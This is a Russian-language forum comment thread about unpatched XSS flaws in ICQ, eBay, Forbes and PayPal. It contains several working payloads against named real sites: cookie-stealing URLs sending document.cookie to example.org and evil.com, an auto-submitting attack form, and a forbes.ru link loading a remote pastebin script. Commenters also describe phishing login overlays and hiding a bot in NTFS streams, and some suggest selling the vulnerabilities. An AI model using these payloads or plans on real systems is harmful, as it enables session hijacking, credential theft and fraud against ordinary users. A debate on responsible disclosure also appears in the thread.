Хабр Курсы для всех
РЕКЛАМА
Практикум, Хекслет, SkyPro, авторские курсы — собрали всех и попросили скидки. Осталось выбрать!
Хабр доступен 24/7 благодаря поддержке друзей
Комментарии 67
хм, а если скинуть ссылку кому-то еще?
практический пример хоть по одному из вышеприведенных?
Можно выполнять произвольный JS-код: тырим куки @ отправляем себе на сервер
выполнить то можно, но в преобладающем большинстве случаев результат этого выполнения увидите только вы и только в своем браузере
да ладно: за скромную плату любой порносайт будет открывать у своих посетителей всплывающие окна с произвольным адресом
С одной стороны пассивная xss мало толку дает. Но например можно скрытно воткнуть iframe на exploit. Или если сайт позволяет отправлять что-то или менять пароль только GET запросом, то можно запихнуть в ссылку. Так то спорить не буду, уязвимость сомнительная
Даже если это не ГЕТ, то никакой разницы нет, создается страничка-прокладка, типа evil.html, в нее пишется что то типа:
Жертве кидается этот линк под любым предлогом.
<html>
<body onload="document.getElementById('sf').submit();">
<form id="sf" action="http://sait-gde-xss.com/forma.php">
<input type="hidden" name="search" value="tut telo xsski v urlencode naprimer">
<input type="submit" value="." style="display:none;">
</form>
</body>
</html>
Жертве кидается этот линк под любым предлогом.
Берем куки, ставим себе, мы авторизованы под жертвой.
Вы с преобладающего большинства случаев как-то быстро ушли на конкретный paypal ) По-моему мы говорим в более обширном контексте.
Это вы верно заметили, и от xss действительно спасает привязка кукисов к ip например и прочие техники. Но мы вроде бы говорим вообще (в большинстве случаев никто ничего не привязывает), а не в частности.
Семантер, вы серьезно? Как зачем куки? Куки часто выступают авторизационной информацией (логин / пасс / сессия / что угодно). Подставляя эти данные себе мы можем войти в админку / кабинет и так далее. Прежде чем что-то говорить, иногда советую вам потратить пару минут в интернете на вопрос «что такое хсс» и с чем его едят. Поверьте вы очень смешны любому более-менее знающему хакеру, для которого раскрытие путей и то уже большой подарок и он сможет выжать из этого многое. Не говоря уж о хсс.
В опере есть встроенный едитор кукисов, в мозилле полно плагинов, в чем проблема?
Выкладывайте свои куки, хранимые хабрахабром, раз никакой проблемы нету
Лолшто товарищ? Вы думаете человек, знающий html/js, способный раскрутить xss на подобных серверах не знает как подменить куки? Что за абсурд?
Знаете, я многим обьяснял все тонкости хсс, и никто не впадал в ступор. Даже странно слышать.
человек впадает в ступор
Знаете, я многим обьяснял все тонкости хсс, и никто не впадал в ступор. Даже странно слышать.
Ээээ… Да при сегодняшних тулзах даже скрипт-кидди сможет это сделать. Это вам не десять лет назад.
Это троль, хватит его кормить, не отвечайте ему
Интересно как он вообще на хабр попал)
Интересно как он вообще на хабр попал)
Семастер, ну берегите же вы свои нервные клетки, если с вашей точки зрения мы пишем бред, ну просто забейте и скажите про себя «вот идиоты» и перестаньте нам доказывать свои истины. Разве мы стоим вашего времени?
да, вы правы. xss — не уязвимость, а сплошная спекуляция. мы просто троллим.
Вы думаете я бегу в гугл за «что такое хсс»? Знаете есть такой журнал — Хакер? i.imgur.com/yKYt6Gc.jpg
Знаете есть такой журнал — Хакер?
Интересную мурзилку вы упомянули… прокомментируете? Основная мысль: " на 11.10.2013 99,9% доступных вэб серверов можно использовать как прокси". Вы считаете, что серьезное техническое издание может такое написать?
Извините, не читал, и особого желания в 0:55 читать нет. Комментировать не буду, про «мурзилку» это вы конечно зря, просто формат издания не позволяет фильтровать какие-то не точности иногда — не все из редакторов разбираются в той или иной теме так, как авторы статей. Иначе бы эти авторы и не нужны были, редакторы бы сами все писали и все. В любом случае, я не редактор, а автор, и если вы найдете оплошности в моих статьях — велкам, обсудим. За других отвечать я не буду. А если вы к тому, что «васька плохо написал, значит там все такие» — ну незнаю, почитайте Степа, Мага, Касперского (не Евгения) и других мастеров своего дела.
PHP-бот для Windows КОДИМ БОТА ДЛЯ РАСПРЕДЕЛЕННЫХ ВЫЧИСЛЕНИЙ . Ваше? Прочитал. Позволю себе извлечь основную мыль статьи: пишем скрипт на PHP принимающий команды от сервера, компилируем это дело при помощи специальной утилитки в .exe, берем у друга программку md5.exe, объединяем это в единую систему в .bat скрипте, который тоже компилируем в .exe. Особо доставило:
Зачем все это? Расшифровать md5. Судя по контексту несоленый. Один.
ХАКЕРСКИЕ ФИЧИ
attrib "%CD%\bot.exe" +h +s
Такая команда скроет и сделает системным наш файл бота.
Спрятать файл в потоках NTFS немного сложнее:
cd “%systemroot%\system32
type packed_bot.exe>calc.exe:b0t.exe
Зачем все это? Расшифровать md5. Судя по контексту несоленый. Один.
Хех, действительно мое ) Данная статья скорее концепт, мне действительно пришлось нечто такое сооружать, но это небыл брут мд5, кое-что другое. Просто читателям нужно донести суть, а не рассказывать ненужные людям моменты.
Насчет врезок, которые вам «доставили», ну что ж, могу сказать только то, что разделов в журнале много, и какая-то информация, которая является очевидной и простой для сисадмина, не всегда очевидна для программера (программер это не сисадмин). Понимаете, журнал и другая литература это не показывание «насколько я крут» и как много умных слов я знаю. Это наоборот диалог с читателем и старание донести ему полезные приемы, информацию и прочее.
Насчет врезок, которые вам «доставили», ну что ж, могу сказать только то, что разделов в журнале много, и какая-то информация, которая является очевидной и простой для сисадмина, не всегда очевидна для программера (программер это не сисадмин). Понимаете, журнал и другая литература это не показывание «насколько я крут» и как много умных слов я знаю. Это наоборот диалог с читателем и старание донести ему полезные приемы, информацию и прочее.
Вы только не обижайтесь. В общем статья познавательная и без проявлений явной некомпетентности, как по первой ссылке. Прекрасно понимаю, что «Хакер» не может уследить за всем что печатает. У журнала есть свои читатели — молодые люди, желающие получить общее представление о компьютерной безопасности. Просто считаю некорректным приводить его в качестве авторитетного источника информации.
Конечно, я не обижаюсь.
Но я думаю, что XSS все-таки является одним из самых распространенных и хорошо известных способов взлома, тем самым можно предположить, что если уж я написал об этом статью в журнал, где большинство редакторов (если не все) имеют представление о том, что это такое, и они это издали, то, скорее всего, я прав в нашем небольшом спорчике со semaster'ом.
С наступающим!
Но я думаю, что XSS все-таки является одним из самых распространенных и хорошо известных способов взлома, тем самым можно предположить, что если уж я написал об этом статью в журнал, где большинство редакторов (если не все) имеют представление о том, что это такое, и они это издали, то, скорее всего, я прав в нашем небольшом спорчике со semaster'ом.
С наступающим!
Автора посмотрите.
На PayPal, например, можно стилизовать и вывести окошко: подтвердите пожалуйста номер карты. Номер потом отослать себе.
Такое окошко там реально существует и может появляется при входе с другого IP, так что пользователь ничего не заподозрит.
Такое окошко там реально существует и может появляется при входе с другого IP, так что пользователь ничего не заподозрит.
У вас явно мало фантазии.
Произвольный JS = можно нарисовать идентичную форму логина на сайт и через history API и заменить урл в адресной строке
Вообще никак не отличить от реального диалога логина, работает как реальный диалог, но дополнительно отсылает данные на сторонний сервер.
Работает с любым сайтом вообще.
Произвольный JS = можно нарисовать идентичную форму логина на сайт и через history API и заменить урл в адресной строке
Вообще никак не отличить от реального диалога логина, работает как реальный диалог, но дополнительно отсылает данные на сторонний сервер.
Работает с любым сайтом вообще.
Вы программист? Если да, то я вам соболезную. Вы выбрали не ту профессию. Без обид.
Чем больше, таких как вы, тем больше возможностей заработать людям, которые знаю, как xss атаку применять.
Если вам все равно, пожалуйста, доказывайте дальше, но не тут. Просто вы сейчас выставляет себя клоуном.
Не надо опускать хакеров, которые создали данную группу уязвимостей.
Чем больше, таких как вы, тем больше возможностей заработать людям, которые знаю, как xss атаку применять.
Если вам все равно, пожалуйста, доказывайте дальше, но не тут. Просто вы сейчас выставляет себя клоуном.
Не надо опускать хакеров, которые создали данную группу уязвимостей.
Да программист с 13 летнем стажем. Я видел «сцену», рост хак темы и тд… Был на тусовках. Продолжать дальше не буду по объективным причинам.
Вы еще больше опустили себя.
и да «хакеры» уязвимости не создали, они нашли пути их применения.
Сами себя опровергаете. Хоть выделил в кавычки слово.
и не выплатят вознаграждения за репорты «уязвимостей», не все хакеры заинтересованы в деньгах. Тут причина драйва. + вы не знаете, что изначально обозначает слово хакер.
Вы не ответили на мой четкий вопрос. Значит с высокой вероятностью нет.
Мне ваши соболезнования не нужны, соболезнуют все тут собравшийся, что настоящих ИТ-шников мало. А псевдо ИТ-шников полно. Вы тут затесались не понятной причине. Зачем вам комментировать, если мы тут все не правы? Что хотите доказать? Вы не поменяете мнение других. Может не все знаю как применять, но есть кто знает.
Лучше не злите народ и не стоит тут обсуждать ваши минусы. Если что меня поправят другие. За обсуждения системы баллов запрещено.
Вам проще забыть эту тему. Так вам будет проще жить. Вы уйму нервных клеток потратили, а других повеселили.
Вы еще больше опустили себя.
и да «хакеры» уязвимости не создали, они нашли пути их применения.
Сами себя опровергаете. Хоть выделил в кавычки слово.
и не выплатят вознаграждения за репорты «уязвимостей», не все хакеры заинтересованы в деньгах. Тут причина драйва. + вы не знаете, что изначально обозначает слово хакер.
Вы не ответили на мой четкий вопрос. Значит с высокой вероятностью нет.
Мне ваши соболезнования не нужны, соболезнуют все тут собравшийся, что настоящих ИТ-шников мало. А псевдо ИТ-шников полно. Вы тут затесались не понятной причине. Зачем вам комментировать, если мы тут все не правы? Что хотите доказать? Вы не поменяете мнение других. Может не все знаю как применять, но есть кто знает.
Лучше не злите народ и не стоит тут обсуждать ваши минусы. Если что меня поправят другие. За обсуждения системы баллов запрещено.
Вам проще забыть эту тему. Так вам будет проще жить. Вы уйму нервных клеток потратили, а других повеселили.
Кстати сам сайт icq.com куки выдает на .icq.com и не httponly
Вот так можно украсть куки:
Вот так можно украсть куки:
http://search.icq.com/search/selected_img.php?site_url=javascript:alert(window.location='http://example.org/icq.html?'.concat(document.cookie))Позвольте спросить, зачем тут.конкат? Даже не +конкат, а именно.конкат ). Может все-таки + escape(document.cookie). Или вообще + encodeURIComponent(document.cookie)? Или даже вот так:
http://search.icq.com/search/selected_img.php?site_url=javascript:var x=new Image(); x.src='http://evil.com/s.php?c='+encodeURIComponent(document.cookie);
Зря это вы про минусующих вспомнили, и про их непревзойдённость заговорили. Вас ведь правда по делу минусуют, ибо вероятность использовать подобные уязвимости есть, если не на paypal, то на каком-то icq — точно. Проверьте сами, никто не обязан вас тыкать носом, где и чего именно можно применить.
В любом случае, Вас тоже с наступающим! :)
Если Вы считаете, что большинство не право, тогда объясните как XSS попало в TOP10 OWASP, причём как A3? Я советую Вам лучше изучить теорию, чтобы понимать как это работает и как это можно применять. Ваши выводы похоже на недостаток опыта.
выкладывайте пример хоть по одному из приведенному сайту где произведены какое либо значимое действие (авторизация\изменение настроек\перевод) в отношении сайта
Да без проблем! Не поленился, написал специально для Вас код на JS, который, используя уязвимость на forbes.ru меняет каждое из полей «О себе» на «XSS PoC».
Скрипт относительно прост, написан на скорую руку, поэтому и комментариев нет. Писался только для PoC (Proof of Concept) эксплоита. Тестировался только в последней Mozilla Firefox.
Это лишь пример, но он наглядно демонстрирует, как с помощью XSS можно влиять на критически важную информацию пользователя.
Сам код находится здесь:
http://pastebin.com/bgBmN6kBИспользовать (после авторизации, естественно) так:
http://www.forbes.ru/search-content?keys=%22%3E%3Cscript%20src=%22http://pastebin.com/raw.php?i=bgBmN6kB%22%3E%3C/script%3EПрошу заметить, что для вывода дебаг-лога используется всплывающее окно, созданное JavaScript'ом. Мозилла по-дефолту режет такие, поэтому для просмотра лога разрешить открытие нового окна, когда браузер это попросит.
Использование данного скрипта разрешено только в учебных целях. Я, автор вышеизложенного кода, не несу никакой ответственности за любое его незаконное использование.
Не знаю кто как, а вообще в крупных компаниях за репорты об уязвимостях еще и финансовое вознаграждение полагается (ну, в нормальных западных компаниях и одной нашей)… Врядли это относится к указанный вышей сайтам, ну да и ладно, это их проблема, что они даже не удосужились прочитать/понять, что им прислали…
С другой стороны, вайтхаты (мы же на светлой стороне, правильно?) не должны выкладывать в паблик не закрытые уязвимости, даже при таком раскладе с безалаберностью из администрации… обычные пользователи пострадают из-за этого, как только очередная партия скрипткиддеров получит «знания» и пойдет тестить на своих соседях/девушках/клиентах ebay.
С другой стороны, вайтхаты (мы же на светлой стороне, правильно?) не должны выкладывать в паблик не закрытые уязвимости, даже при таком раскладе с безалаберностью из администрации… обычные пользователи пострадают из-за этого, как только очередная партия скрипткиддеров получит «знания» и пойдет тестить на своих соседях/девушках/клиентах ebay.
А вот мне кажется, что вы неправы. Пока уязвимость не раскрыта публично, у разработчика продукта есть выбор: закрыть или проигнорировать. Помните? Пока для производителя автомобиля дешевле заплатить семьям погибших и искалеченным, чем устранять опасный брак — люди будут гибнуть. Из реальных примеров — Windows NT и пинг смерти. Microsoft не собиралась закрывать эту уязвимость, но была вынуждена ввиду активной эксплуатации.
В случае публичного раскрытия уязвимости у производителя тоже есть выбор: или сделать действительно безопасный продукт или похоронить, ибо велика вероятность что придет армия школьников и уничтожит его.
В случае публичного раскрытия уязвимости у производителя тоже есть выбор: или сделать действительно безопасный продукт или похоронить, ибо велика вероятность что придет армия школьников и уничтожит его.
Это утверждение справедливо для производителей софта, а не интернет-сервисов, т.к. даже закрытые давно 0days не гарантируют того, что их перестанут использовать эксплойтпаки типа BlackHole Exploit Kit, скорей даже наоборот — когда закрывается очередная дырав джаве или флеше, эти обновления полностью реверсятся и пишутся новые эксплойты под уже закрытые баги. Шутка ли, если на много больше половины обычных домашних пользователей не обновляют свои, к тому же пиратские, windows? Даже в банках обновления для пользователей ставятся только тогда, когда эти обновления решают проблемы, а не устраняют уязвимости. Да и большое количество софта у них работает только на устаревших версиях джавы и от этого никуда не деться…
Вот тут то и появляется оценка рисков, когда вероятность плохого сценария очень мала, эффект от воздействия недооценен и выставлен «сильный уровень воздействия», а итоговое значение — незначительный риск. А при нашем менталитете компании закрывают реальные баги в ПО просто пачкой документов, чтобы регуляторы не придрались. Это и есть «бумажная безопасность». Чего же надо было ждать от вендоров?
Вот тут то и появляется оценка рисков, когда вероятность плохого сценария очень мала, эффект от воздействия недооценен и выставлен «сильный уровень воздействия», а итоговое значение — незначительный риск. А при нашем менталитете компании закрывают реальные баги в ПО просто пачкой документов, чтобы регуляторы не придрались. Это и есть «бумажная безопасность». Чего же надо было ждать от вендоров?
Вот к примеру в PayPal говорили, что нет угрозы — платить не будем, даже когда я записал видео. Раз нет угрозы, почему бы не выложить в паблик?)
У меня уже примерно полгода есть доступ к базе отечественного магазина nokia, которая содержит ФИО, телефоны покупателей и некоторые другие данные. Писал в поддержкуи nokia — этот сайт вне их компетенции. Писал по контактам на сайте — молчание.
Напишите об этом в роскомнадзор, хоть какая-то польза от него должна же быть =)
Я как-то тоже обнаружил возможность внедрения простейшей SQL-инъекции с получением всей БД одного из фотоконкурсов местного интернет-провайдера. Админу-разработчику-верстальщику сообщил, он в спешке поправил. Думается, если бы я не был с ним знаком и сообщил телефонной девочке из этой компании, вряд ли бы уязвимость была устранена.
Все верно, дистрибьютор-магазин не является собственностью Нокии и поэтому писать надо владельцам магазина, а то что они завафлили и забили это их косяк и да это плохо. Пишите еще в магазин, либо забейте(что плохо), либо в паблик — тот же bugscollector. Но я против паблика, слишком не хорошо для юзверей сервиса, все же не XSS… ) Если Магазин будет игнорировать — роскомнадзор)
Есть еще решение, в личку написал.
Почему не указали тех, кто нашел уязвимости? И почему нет ссылок на сам ресурс bugscollector.com?
с пейпала бы можно денег стрясти. или продать
кстати кому надо header inject вконтакте?
кстати кому надо header inject вконтакте?
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
0day* уязвимости к Новому Году: ICQ, Ebay, Forbes, PayPal и AVG